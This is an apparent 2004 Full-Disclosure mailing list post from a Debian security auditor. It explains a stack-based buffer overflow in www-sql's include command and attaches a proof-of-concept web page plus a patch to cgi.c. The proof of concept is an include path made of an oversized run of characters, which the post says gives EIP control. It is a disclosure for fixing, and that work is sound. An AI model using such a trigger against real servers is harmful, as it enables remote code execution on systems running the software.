[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] Re: [SECURITY] [DSA 523-1] New www-sql packages fix buffer overflow
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] Re: [SECURITY] [DSA 523-1] New www-sql packages fix buffer overflow
- From: Ulf Härnhammar <Ulf.Harnhammar.9485@xxxxxxxxxxxxx>
- Date: Sun, 20 Jun 2004 23:03:04 +0200
www-sql has an include command, allowing programs written in www-sql
to include files. The buffer overflow occurs when an include command
in a web page has a too long path, either one that is hardcoded or
one that is stored in a variable. The buffer overflow is stack-based
and gives you control over EIP.
In the special case where the include command uses a parameter
controlled by the web page's visitors (by form data or otherwise),
the overflow can be exploited remotely. Otherwise it is a local
privilege escalation.
I have attached a patch (against version 0.5.7) and a sample
web page.
// Ulf Harnhammar
Debian Security Audit Project
http://www.debian.org/security/audit/
<html>
<head>
<title>www-sql buffer overflow proof of concept</title>
</head>
<body>
<h1>www-sql buffer overflow proof of concept</h1>
test = <!sql print $test>
<br>
<!sql include
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU>
<!sql include $test>
</body>
</html>
--- cgi.c.old 1998-09-15 11:28:26.000000000 +0200
+++ cgi.c 2004-06-08 21:42:54.000000000 +0200
@@ -245,15 +245,19 @@
#endif
/* execution doesn't get this far if PATH_TRANSLATED isn't set */
+
pathtrans = getenv("PATH_TRANSLATED");
+ if (strlen(pathtrans) > 1001)
+ exit(117);
slash = strrchr(pathtrans, '/');
if (slash != NULL) {
strncpy(fname, pathtrans, (slash - pathtrans) + 1);
fname[slash - pathtrans + 1] = '\0';
- strcat(fname, name);
+ strncat(fname, name, 1024 - strlen(fname));
} else {
- strcpy(fname, name);
+ strncpy(fname, name, sizeof(fname));
}
+ fname[1023] = '\0';
f = fopen(fname, "r");
if (f == NULL)
fprintf(yyout, "<p><b>include</b> - can't open file %s</p>\n", fname);